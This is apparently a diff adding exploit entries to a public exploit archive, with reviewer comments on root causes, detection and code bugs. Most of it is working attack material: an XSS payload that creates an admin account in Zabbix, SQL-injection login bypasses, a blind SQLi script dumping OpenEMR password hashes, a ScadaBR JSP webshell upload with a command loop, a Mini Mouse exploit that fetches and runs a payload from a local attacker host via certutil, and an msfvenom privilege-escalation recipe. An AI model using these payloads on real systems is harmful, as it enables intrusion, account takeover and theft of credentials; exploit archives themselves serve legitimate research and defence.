+    print(info+FT+'Have a '+SB+FB+'GetSimpleCMS '+SB+FC+'Admin '+ST+'go to this '+SB+FM+'URL & login'+ST+', and you will get an '+SB+FR+'RCE WebShell'+ST)
+    print(SB+FB+WEBAPP_URL+ENCODED_PAYLOAD+ST)
+    sleep(1)
+    print(ok+'Waiting for Admin to login with creds, which will trigger the RCE XHR attack chain..')
+    while True:
+        sleep(1)
+        webshell(RHOST)
\ No newline at end of file
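Review bot: The header comment and the code name different files: steps 5 and 6 of the attack-chain comment say `admin/edit-theme.php`, while `genXssPayload()` builds `u2` from `"theme-edit.php"`. Anyone deriving a log search or WAF rule from the header would look at the wrong path, so the comment should read `admin/theme-edit.php`. The request parameter `FierceGodKick` and the `shell_exec($_REQUEST[...])` line written into the theme file are fixed strings here; naming them in the header as indicators would help reviewers of theme files and access logs. Separately, `bullet()` assigns `C` from its `color` argument and never uses it, so `info`, `err` and `ok` all render in the same colour; the return line presumably meant `SB+C+'['+ST+SB+char+SB+C+']'+ST+' '`.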
diff --git a/exploits/php/webapps/49729.txt b/exploits/php/webapps/49729.txt
new file mode 100644
index 000000000..ddfd73c08
--- /dev/null
+++ b/exploits/php/webapps/49729.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Zabbix 3.4.7 - Stored XSS
+# Date: 30-03-2021
+# Exploit Author: Radmil Gazizov
+# Vendor Homepage: https://www.zabbix.com/
+# Software Link: https://www.zabbix.com/rn/rn3.4.7
+# Version: 3.4.7
+# Tested on: Linux
+
+# Reference -
+https://github.com/GloryToMoon/POC_codes/blob/main/zabbix_stored_xss_347.txt
+
+1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382)
+2- Create new dashboard
+3- Add a new widget => Type: Map nabigation tree
+4- Past into parameter "Name": <img src="x" onerror="var n='hck',q=jQuery;q.post('users.php',{sid:q('#sid').attr('value'),form:'Create+user',alias:n,name:n,surname:n,'user_groups[]':7,password1:n,password2:n,theme:'default',refresh:'9s',rows_per_page:9,url:'',user_type:3,add:'Add'});">
+5- Click to "Add" button
\ No newline at end of file
diff --git a/exploits/php/webapps/49740.txt b/exploits/php/webapps/49740.txt
new file mode 100644
index 000000000..024ce8cbf
--- /dev/null
+++ b/exploits/php/webapps/49740.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Simple Food Website 1.0 - Authentication Bypass
+# Date: 2021-04-03
+# Exploit Author: Viren Saroha (illusion)
+# Vendor Homepage: https://www.sourcecodester.com/php/12510/simple-food-website-php.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=12510&title=Simple+Food+Website+%28CMS%29+in+PHP+with+Source+Code
+# Version: 1.0
+# Tested on: Windows 10/Kali Linux
+
+POC
+
+Step 1 -  Go to url http://localhost/food/admin/login.php
+Step 2 – Enter anything in username and password
+Step 3 – Click on Login and capture the request in burpsuite
+Step 4 – Change the username to ' or '1'='1'#
+Step 5 – Click forward and now you will be logged in as admin.
+
+
+REQUEST
+
+
+POST /food/admin/process_login.php HTTP/1.1
+Host: 192.168.132.128
+Content-Length: 76
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://192.168.132.128
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://192.168.132.128/food/admin/login.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=44189551c332ee92a95246aac0756dd3
+Connection: close
+
+username=%27+or+%271%27%3D%271%27%23&password=randomPassword&Sign+In=Sign+In
\ No newline at end of file
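Review bot: The title calls this an authentication bypass, but the write-up never names the underlying flaw. Step 4 and the request body put `' or '1'='1'#` into `username`, which suggests the login query behind `process_login.php` concatenates that field into SQL. A `# Description:` line stating this, with the affected parameter, would let a reader classify the issue and see the fix, which is a prepared statement for the credential lookup. The same applies to exploits/php/webapps/49741.txt further down, where the field is `admin_username` and the endpoint is `adminlogin.php`.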
diff --git a/exploits/php/webapps/49741.txt b/exploits/php/webapps/49741.txt
new file mode 100644
index 000000000..8baa68bb1
--- /dev/null
+++ b/exploits/php/webapps/49741.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Basic Shopping Cart 1.0 - Authentication Bypass
+# Date: 2021-04-03
+# Exploit Author:  Viren Saroha (illusion)
+# Vendor Homepage: https://www.sourcecodester.com/php/10964/basic-shopping-cartphpmysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=10964&title=Basic+Shopping+Cart+using+PHP%2FMySQL+with+Source+Code
+# Version: 1.0
+# Tested on: Windows 10/Kali Linux
+
+POC
+
+Step 1 -  Go to url http://localhost/EdgeSketch/index.php and Click on Admin
+Step 2 – Enter anything in username and password
+Step 3 – Click on Login and capture the request in burpsuite
+Step4 – Change the username to   ' or '1'='1'#
+Step 5 – Click forward and now you will be logged in as admin.
+
+REQUEST
+
+POST /EdgeSketch/adminlogin.php HTTP/1.1
+Host: localhost
+Content-Length: 77
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://localhost/EdgeSketch/index.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=6b7072bb40c321cb336aacef057a0876
+Connection: close
+
+admin_username=%27+or+%271%27%3D%271%27%23&admin_password=random&admin_login=
\ No newline at end of file
diff --git a/exploits/php/webapps/49742.py b/exploits/php/webapps/49742.py
new file mode 100755
index 000000000..448a616f8
--- /dev/null
+++ b/exploits/php/webapps/49742.py
@@ -0,0 +1,75 @@
+# Exploit Title: OpenEMR 4.1.0 - 'u' SQL Injection
+# Date: 2021-04-03
+# Exploit Author: Michael Ikua
+# Vendor Homepage: https://www.open-emr.org/
+# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v4_1_0.zip
+# Version: 4.1.0
+# Original Advisory: https://www.netsparker.com/web-applications-advisories/sql-injection-vulnerability-in-openemr/
+
+#!/usr/bin/env python3
+
+import requests
+import string
+import sys
+
+print("""
+   ____                   ________  _______     __ __   ___ ____ 
+  / __ \____  ___  ____  / ____/  |/  / __ \   / // /  <  // __ \\
+ / / / / __ \/ _ \/ __ \/ __/ / /|_/ / /_/ /  / // /_  / // / / /
+/ /_/ / /_/ /  __/ / / / /___/ /  / / _, _/  /__  __/ / // /_/ / 
+\____/ .___/\___/_/ /_/_____/_/  /_/_/ |_|     /_/ (_)_(_)____/  
+    /_/
+    ____  ___           __   _____ ____    __    _               
+   / __ )/ (_)___  ____/ /  / ___// __ \  / /   (_)              
+  / /_/ / / / __ \/ __  /   \__ \/ / / / / /   / /               
+ / /_/ / / / / / / /_/ /   ___/ / /_/ / / /___/ /                
+/_____/_/_/_/ /_/\__,_/   /____/\___\_\/_____/_/   exploit by @ikuamike 
+""")
+
+all = string.printable
+# edit url to point to your openemr instance
+url = "http://192.168.56.106/openemr/interface/login/validateUser.php?u=" 
+
+def extract_users_num():
+    print("[+] Finding number of users...")
+    for n in range(1,100):
+        payload = '\'%2b(SELECT+if((select count(username) from users)=' + str(n) + ',sleep(3),1))%2b\''
+        r = requests.get(url+payload)
+        if r.elapsed.total_seconds() > 3:
+            user_length = n
+            break
+    print("[+] Found number of users: " + str(user_length))
+    return user_length
+
+def extract_users():
+    users = extract_users_num()
+    print("[+] Extracting username and password hash...")
+    output = []
+    for n in range(1,1000):
+        payload = '\'%2b(SELECT+if(length((select+group_concat(username,\':\',password)+from+users+limit+0,1))=' + str(n) + ',sleep(3),1))%2b\''
+        #print(payload)
+        r = requests.get(url+payload)
+        #print(r.request.url)
+        if r.elapsed.total_seconds() > 3:
+            length = n
+            break
+    for i in range(1,length+1):
+        for char in all:
+            payload = '\'%2b(SELECT+if(ascii(substr((select+group_concat(username,\':\',password)+from+users+limit+0,1),'+ str(i)+',1))='+str(ord(char))+',sleep(3),1))%2b\''
+            #print(payload)
+            r = requests.get(url+payload)
+            #print(r.request.url)
+            if r.elapsed.total_seconds() > 3:
+                output.append(char)
+                if char == ",":
+                    print("")
+                    continue
+                print(char, end='', flush=True)
+
+
+try:
+    extract_users()
+except KeyboardInterrupt:
+    print("")
+    print("[+] Exiting...")
+    sys.exit()
\ No newline at end of file
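Review bot: `#!/usr/bin/env python3` sits on the ninth line of the new file, below the comment header, so it does not act as an interpreter line even though the file mode is 100755; it only has an effect as the first line. `all = string.printable` shadows the builtin `all`, and a name such as `charset` avoids that. In `extract_users_num()` and `extract_users()`, `user_length` and `length` are assigned only inside the `if`, so a run where no response crosses the threshold ends in `UnboundLocalError` rather than a clear message. The value `extract_users()` stores in `users` is never read, and the collected `output` list is never returned.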
diff --git a/exploits/windows/local/49739.txt b/exploits/windows/local/49739.txt
new file mode 100644
index 000000000..1bd3688c5
--- /dev/null
+++ b/exploits/windows/local/49739.txt
@@ -0,0 +1,53 @@
+# Exploit Title: Rockstar Service - Insecure File Permissions
+# Date: 2020-04-02
+# Exploit Author: George Tsimpidas
+# Software Link : https://socialclub.rockstargames.com/rockstar-games-launcher
+# Version Patch: 1.0.37.349
+# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362
+
+Vulnerability Description:
+
+RockstarService.exe  suffers from an elevation of privileges vulnerability which can be used by an "Authenticated User" to modify the existing executable file of the service with a binary of his choice. The vulnerability exist due to weak set of permissions being granted to the "Authenticated Users Group" which grants the (M) Flag aka "Modify Privilege"
+
+#PoC
+
+ D:\Launcher> icacls .\Launcher.exe
+
+.\Launcher.exe BUILTIN\Administrators:(I)(F)
+               NT AUTHORITY\SYSTEM:(I)(F)
+               NT AUTHORITY\Authenticated Users:(I)(M)
+               BUILTIN\Users:(I)(RX)
+
+#1. Create low privileged user & Login  to that user
+
+C:\>net user lowpriv Password123! /add
+C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
+User name lowpriv
+Local Group Memberships *Users
+Global Group memberships *None
+
+#2. Move the RockstarService.exe to a new name
+
+D:\Launcher> move RockstarService.exe RockstarService.exe.bk
+1 file(s) moved.
+
+#3. Create malicious binary on kali linux with MSF
+
+msfvenom -f exe -p windows/exec CMD="net user placebo Password123! /add && net localgroup Administrators placebo /add" -o RockstarService.exe
+
+#4. Transfer created 'RockstarService.exe' to the Windows Host
+
+#5. Move the created 'RockstarService.exe' binary to the 'D:\Launcher' to replace the old one
+
+#6. Now start the Service
+
+Command : net start 'Rockstar Service'
+
+Now check out that the user has been registered to the system and added to the local group of Administrators
+
+C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr
+/v "Full"
+
+User name placebo
+Local Group Memberships *Administrators *Users
+Global Group memberships *None
\ No newline at end of file
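Review bot: The only ACL evidence shown is for `.\Launcher.exe`, while the description and steps 2 to 6 concern `RockstarService.exe`; the `icacls` output for the service binary itself is missing. Every entry in the listing carries `(I)`, which marks the permission as inherited from the parent directory. The `Authenticated Users:(M)` grant may therefore come from the ACL of the `D:\Launcher` install location rather than from the installer, and that decides whether the fix belongs in the product or in where it was installed. I would add the output of `icacls .\RockstarService.exe` and one line naming the account the service runs as, which the text implies is privileged but never shows.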
diff --git a/exploits/windows/webapps/49734.py b/exploits/windows/webapps/49734.py
new file mode 100755
index 000000000..289a44ac7
--- /dev/null
+++ b/exploits/windows/webapps/49734.py
@@ -0,0 +1,110 @@
+# Exploit Title: ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1)
+# Date: 03/2021
+# Exploit Author: Fellipe Oliveira
+# Vendor Homepage: https://www.scadabr.com.br/ 
+# Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux
+# Tested on: Windows7, Windows10
+
+#!/usr/bin/python
+
+import requests,sys,time
+
+
+if len(sys.argv) <=4:
+    print('[x] Missing arguments ... ')
+    print('[>] Usage: python WinScada_RCE.py <TargetIp> <TargetPort> <User> <Password>')
+    print('[>] Example: python WinScada_RCE.py 192.168.1.24 8080 admin admin')
+    sys.exit(0)
+else:	
+    time.sleep(1)
+
+
+host = sys.argv[1]
+port = sys.argv[2]
+user = sys.argv[3]
+passw = sys.argv[4]
+
+flag = False
+LOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm'
+PROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm'
+
+
+banner = '''
++-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
+|    _________                  .___     ____________________       |
+|   /   _____/ ____ _____     __| _/____ \______   \______   \      |
+|   \_____  \_/ ___\\__  \   / __ |\__  \ |    |  _/|       _/       |
+|   /        \  \___ / __ \_/ /_/ | / __ \|    |   \|    |   \      |
+|  /_______  /\___  >____  /\____ |(____  /______  /|____|_  /      |
+|          \/     \/     \/      \/     \/       \/        \/       |
+|                                                                   |
+|    > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload |
+|    > Exploit Author : Fellipe Oliveira  			    |
+|    > Exploit for Windows Systems                                  |
++-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
+'''
+
+def main():
+    payload = {
+        'username': user,
+        'password': passw
+    }
+
+    print(banner)
+    time.sleep(2)
+   
+    with requests.session() as s:
+    	s.post(LOGIN, data=payload)
+	response = s.get(PROTECTED_PAGE)
+
+        print("[+] Trying to authenticate "+LOGIN+"...")
+	if response.status_code == 200:
+	    print("[+] Successfully authenticated! :D~\n")
+	    time.sleep(2)
+	else:
+	    print("[x] Authentication failed :(")
+            sys.exit(0)
+
+	burp0_url = "http://"+host+":"+port+"/ScadaBR/view_edit.shtm"
+	burp0_cookies = {"JSESSIONID": "66E47DFC053393AFF6C2D5A7C15A9439"}
+	burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------6150838712847095098536245849", "Origin": "http://"+host+":"+port+"/", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/view_edit.shtm", "Upgrade-Insecure-Requests": "1"}
+	burp0_data = "-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.name\"\r\n\r\n\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.xid\"\r\n\r\nGV_218627\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"backgroundImageMP\"; filename=\"win_cmd.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%\n%>\n<HTML><BODY>\nCommands with JSP\n<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">\n<INPUT TYPE=\"text\" NAME=\"cmd\">\n<INPUT TYPE=\"submit\" VALUE=\"Send\">\n</FORM>\n<pre>\n<%\nif (request.getParameter(\"cmd\") != null) {\n    out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n    Process p;\n    if ( System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n        p = Runtime.getRuntime().exec(\"cmd.exe /C \" + request.getParameter(\"cmd\"));\n    }\n    else{\n        p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n    }\n    OutputStream os = p.getOutputStream();\n    InputStream in = p.getInputStream();\n    DataInputStream dis = new DataInputStream(in);\n    String disr = dis.readLine();\n    while ( disr != null ) {\n    out.println(disr);\n    disr = dis.readLine();\n    }\n}\n%>\n</pre>\n</BODY></HTML>\n\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\nUpload image\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.anonymousAccess\"\r\n\r\n0\r\n-----------------------------6150838712847095098536245849--\r\n"
+	getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
+
+	print('[>] Attempting to upload .jsp Webshell...')
+	time.sleep(1)
+        print('[>] Verifying shell upload...\n')
+	time.sleep(2)
+	
+	if getdata.status_code == 200:
+	    print('[+] Upload Successfuly!')
+	    
+	    for num in range(1,500):	    
+	    	PATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)
+                find = s.get(PATH)
+
+                if find.status_code == 200:	
+                    print('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num))
+		    flag = True
+                    print('[>] Spawning fake shell...') 
+                    time.sleep(3)                    
+
+	  	    while flag:
+                        param = raw_input("# ")
+	                burp0_url = "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?cmd=%s" % (num,param)
+                        burp0_cookies = {"JSESSIONID": "4FCC12402B8389A64905F4C8272A64B5"}
+                        burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?cmd=%s", "Upgrade-Insecure-Requests": "1"}
+                        send = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)	
+         	        clean = send.text.replace('<pre>', '').replace('<FORM METHOD=', '').replace('<HTML><BODY>', '').replace('"GET" NAME="myform" ACTION="">', '').replace('Commands with JSP', '').replace('<INPUT TYPE="text" NAME="cmd">', '').replace('<INPUT TYPE="submit" VALUE="Send">', '').replace('</FORM>', '').replace('<BR>', '').replace('</pre>', '').replace('</BODY></HTML>', '')
+			print(clean)
+
+  	        elif num == 499:
+                    print('[x] Webshell not Found')
+                    
+	else:
+	    print('Reason:'+getdata.reason+' ')	   
+	    print('Exploit Failed x_x')
+
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file
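Review bot: The header block at the top of this file lists title, versions and test platforms but says nothing about the root cause or the traces the script leaves, which is what someone triaging a ScadaBR host needs. Judging from the multipart body in `main()`, the `backgroundImageMP` field of `/ScadaBR/view_edit.shtm` accepts a file named `win_cmd.jsp`, and the script then finds it served as `/ScadaBR/uploads/<n>.jsp`. I would state that in a comment, e.g. `# Root cause (as exercised here): the view background-image upload keeps a .jsp extension and lands in a directory the servlet container executes`. A second comment should list the artifacts, `# Leaves: a numbered .jsp in ScadaBR/uploads/, up to 499 sequential GETs to /ScadaBR/uploads/<n>.jsp, then GETs carrying ?cmd=`, so log reviewers know what to search for and testers know what to delete afterwards. The root-cause wording is inferred from the requests, not from ScadaBR source, and should be confirmed before it is merged.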
diff --git a/exploits/windows/webapps/49743.py b/exploits/windows/webapps/49743.py
new file mode 100755
index 000000000..5ee330f30
--- /dev/null
+++ b/exploits/windows/webapps/49743.py
@@ -0,0 +1,27 @@
+# Exploit Title: Mini Mouse 9.2.0 - Remote Code Execution
+# Author: gosh
+# Date: 01-04-2021
+# Vendor Homepage: http://yodinfo.com
+# Software Link: https://imgv.oss-cn-hangzhou.aliyuncs.com/minimouse.msi
+# Version: 9.2.0
+# Tested on: Windows 10 Pro build 19042.662
+
+#!/usr/bin/python3
+import requests
+import json
+import jsonargparse
+from time import sleep
+
+ip = input("target's ip:  ")
+lhost = input("local http server ip: ")
+name = input("payload file name: ")
+url = "http://{}:8039/op=command".format(ip)
+headers = {"Content-Type": "application/json", "Connection": "keep-alive", "Accept": "*/*", "User-Agent": "MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)", "Accept-Language": "en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8", "Accept-Encoding": "gzip, deflate"}
+down = {"command_operate_type": 0, "name": "abc", "script": f"certutil.exe -urlcache -split -f http://{lhost}/{name} C:\\Windows\\Temp\\{name}", "time": 0, "type": 100000}
+r = requests.post(url, headers=headers, json=down)
+print("[+] Retrieving payload")
+sleep(1)
+shell={"command_operate_type": 0, "name": "abd", "script": f"start /B C:\\Windows\\Temp\\{name}", "time": 0, "type": 100000}
+s = requests.post(url, headers=headers, json=shell)
+print (r.status_code)
+print ("[+] got shell!")
\ No newline at end of file
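Review bot: Nothing in the header comments tells the reader that this PoC reaches `/op=command` on port 8039 without any credential; the two `requests.post` calls send only a JSON body with a `script` field and no authentication material. I would add a comment such as `# The service on TCP 8039 runs the "script" value as a Windows command; this PoC sends no login`, plus a mitigation line, `# Mitigation: block inbound 8039 at the host firewall or remove Mini Mouse until the vendor ships a fix`. For detection the comment can name what the script visibly causes: `certutil.exe -urlcache -split -f` writing into `C:\Windows\Temp`, followed by `start /B` of that file. Separately, `import json` and `import jsonargparse` are never used, and the latter is a third-party package that anyone running the file would have to install for no reason.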
diff --git a/exploits/windows/webapps/49744.txt b/exploits/windows/webapps/49744.txt
new file mode 100644
index 000000000..bfb11f090
--- /dev/null
+++ b/exploits/windows/webapps/49744.txt
@@ -0,0 +1,172 @@
+# Exploit Title: Mini Mouse 9.2.0 - Path Traversal
+# Author: gosh
+# Date: 02-04-2021
+# Vendor Homepage: http://yodinfo.com
+# Software Link: https://imgv.oss-cn-hangzhou.aliyuncs.com/minimouse.msi
+# Version: 9.2.0
+# Tested on: Windows 10 Pro build 19042.662
+
+POC
+
+GET /file=C:%5CWindows%5Cwin.ini HTTP/1.1
+Host: 192.168.1.111:8039
+Content-Type: application/json
+Connection: keep-alive
+Accept: */*
+User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
+Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
+Content-Length: 0
+Accept-Encoding: gzip, deflate
+
+{}
+
+
+
+
+.......................................................
+
+HTTP/1.1 200 OK
+Server: bruce_wy/1.0.0
+Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
+Access-Control-Allow-Headers: Content-Type,Origin,Accept
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Credentials: true
+P3P: CP=CAO PSA OUR
+Content-Type: application/octet-stream
+Content-Range: bytes 0-0/92
+Content-Length : 92
+
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
+
+
+second POC:
+
+POST /op=get_file_list HTTP/1.1
+Host: 192.168.1.111:8039
+Content-Type: application/json
+Connection: keep-alive
+Accept: */*
+User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
+Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
+Content-Length: 28
+Accept-Encoding: gzip, deflate
+
+{"path":"C:\\Users\\Public"}
+
+
+
+.............................................................
+
+HTTP/1.1 200 OK
+Server: bruce_wy/1.0.0
+Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
+Access-Control-Allow-Headers: Content-Type,Origin,Accept
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Credentials: true
+P3P: CP=CAO PSA OUR
+Content-Type: application/json
+Content-Range: bytes 0-0/-1
+
+{
+"ret_code": 1,
+"ret_msg": "success",
+"data": {
+"list": [{
+"path": "C:\\Users\\Public\\AccountPictures",
+"is_hide": true,
+"is_floder": true,
+"name": "AccountPictures",
+"name_display": "AccountPictures",
+"file_size": 0,
+"create_time": 1615677,
+"update_time": 1615737,
+"sys_type": 2
+}, {
+"path": "C:\\Users\\Public\\Desktop",
+"is_hide": true,
+"is_floder": true,
+"name": "Desktop",
+"name_display": "Desktop",
+"file_size": 0,
+"create_time": 1575713,
+"update_time": 1617276,
+"sys_type": 2
+}, {
+"path": "C:\\Users\\Public\\desktop.ini",
+"is_hide": true,
+"is_floder": false,
+"name": "desktop.ini",
+"name_display": "desktop",
+"file_size": 174,
+"create_time": 1575713,
+"update_time": 1575713,
+"sys_type": 2
+}, {
+"path": "C:\\Users\\Public\\Documents",
+"is_hide": false,
+"is_floder": true,
+"name": "Documents",
+"name_display": "Documents",
+"file_size": 0,
+"create_time": 1575713,
+"update_time": 1575713,
+"sys_type": 2
+}, {
+"path": "C:\\Users\\Public\\Downloads",
+"is_hide": false,
+"is_floder": true,
+"name": "Downloads",
+"name_display": "Downloads",
+"file_size": 0,
+"create_time": 1575713,
+"update_time": 1575713,
+"sys_type": 2
+}, {
+"path": "C:\\Users\\Public\\Libraries",
+"is_hide": true,
+"is_floder": true,
+"name": "Libraries",
+"name_display": "Libraries",
+"file_size": 0,
+"create_time": 1575713,
+"update_time": 1575714,
+"sys_type": 2
+}, {
+"path": "C:\\Users\\Public\\Music",
+"is_hide": false,
+"is_floder": true,
+"name": "Music",
+"name_display": "Music",
+"file_size": 0,
+"create_time": 1575713,
+"update_time": 1575713,
+"sys_type": 2
+}, {
+"path": "C:\\Users\\Public\\Pictures",
+"is_hide": false,
+"is_floder": true,
+"name": "Pictures",
+"name_display": "Pictures",
+"file_size": 0,
+"create_time": 1575713,
+"update_time": 1575713,
+"sys_type": 2
+}, {
+"path": "C:\\Users\\Public\\Videos",
+"is_hide": false,
+"is_floder": true,
+"name": "Videos",
+"name_display": "Videos",
+"file_size": 0,
+"create_time": 1575713,
+"update_time": 1575713,
+"sys_type": 2
+}]
+}
+}
\ No newline at end of file
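Review bot: The title calls this a path traversal, but neither request contains a `..` sequence: the first passes an absolute path in `/file=C:%5CWindows%5Cwin.ini` and the second an absolute directory in the JSON `path` of `/op=get_file_list`. The write-up should say so in a sentence under `POC`, for example `Both endpoints accept an absolute Windows path and return its content or listing; no authentication header is sent in these requests`, because a detection rule keyed on `../` would miss this traffic. It would also help to record the response headers `Access-Control-Allow-Origin: *` together with `Access-Control-Allow-Credentials: true`, which are visible in both responses, as a separate item for the vendor report.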
diff --git a/files_exploits.csv b/files_exploits.csv
index 613404ee3..ecf4932db 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6776,6 +6776,7 @@ id,file,description,date,author,type,platform,port
 49638,exploits/windows/dos/49638.py,"Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)",2021-03-11,"Enes Özeser",dos,windows,
 49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",2021-03-19,LiquidWorm,dos,hardware,
 49697,exploits/multiple/dos/49697.py,"ProFTPD 1.3.7a - Remote Denial of Service",2021-03-22,xynmaps,dos,multiple,
+49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",2021-03-31,Enesdex,dos,hardware,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11309,6 +11310,7 @@ id,file,description,date,author,type,platform,port
 49703,exploits/windows/local/49703.txt,"ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path",2021-03-23,SamAlucard,local,windows,
 49704,exploits/windows/local/49704.txt,"Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path",2021-03-23,"Alan Mondragon",local,windows,
 49706,exploits/windows/local/49706.txt,"Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path",2021-03-24,"Mohammed Alshehri",local,windows,
+49739,exploits/windows/local/49739.txt,"Rockstar Service - Insecure File Permissions",2021-04-05,"George Tsimpidas",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18434,6 +18436,8 @@ id,file,description,date,author,type,platform,port
 49682,exploits/hardware/remote/49682.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access",2021-03-19,LiquidWorm,remote,hardware,
 49695,exploits/hardware/remote/49695.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Weak Default WiFi Password Algorithm",2021-03-22,LiquidWorm,remote,hardware,
 49719,exploits/multiple/remote/49719.py,"vsftpd 3.0.3 - Remote Denial of Service",2021-03-29,xynmaps,remote,multiple,
+49745,exploits/multiple/remote/49745.js,"Google Chrome 86.0.4240 V8 - Remote Code Execution",2021-04-06,"Tobias Marcotto",remote,multiple,
+49746,exploits/multiple/remote/49746.js,"Google Chrome 81.0.4044 V8 - Remote Code Execution",2021-04-06,"Tobias Marcotto",remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
